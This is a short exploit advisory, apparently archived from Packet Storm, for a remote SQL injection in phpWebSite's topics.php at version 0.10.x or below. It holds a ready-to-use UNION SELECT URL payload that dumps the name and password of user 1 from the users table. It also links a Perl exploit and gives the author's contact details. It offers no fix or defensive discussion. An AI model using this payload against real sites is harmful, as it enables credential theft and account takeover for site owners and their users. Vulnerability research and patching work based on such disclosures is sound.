phpWebSite versions less than and equal to 0.10.1 suffer from an SQL injection vulnerability in topics.php.
9c47dd1a237d5caacf6b515cfa27dc0dbb4a7f33d48d453528fa61644c5499f1---------------------------------------------------------------------------
phpWebSite <= 0.10.? (topics.php) Remote SQL Injection Exploit
---------------------------------------------------------------------------
Discovered By SnIpEr_SA
Author : SnIpEr_SA
Exploit in Perl : http://www.milw0rm.com/exploits/1525
Remote : Yes
Local : No
Critical Level : Dangerous
---------------------------------------------------------------------------
Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Application : phpWebSite
version : 0.10.?
URL : http://phpwebsite.appstate.edu/
...
------------------------------------------------------------------
Exploit:
~~~~~~~~
# http://example.com/path/topics.php?op=viewtopic&topic=-1 Union select name,name,pass,name From users where uid=1
---------------------------------------------------------------------------
Contact:
~~~~~~~~
SnIpEr_SA
E-mail: selfar2002@hotmail.com
E-mail: SnIpEr_SA[at]Basdmail[dot]org
Homepage: http://www.3asfh.com/ & http://www.lezr.com/
Greetz: All My Frind
-------------------------------- [ EOF ] ----------------------------------
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed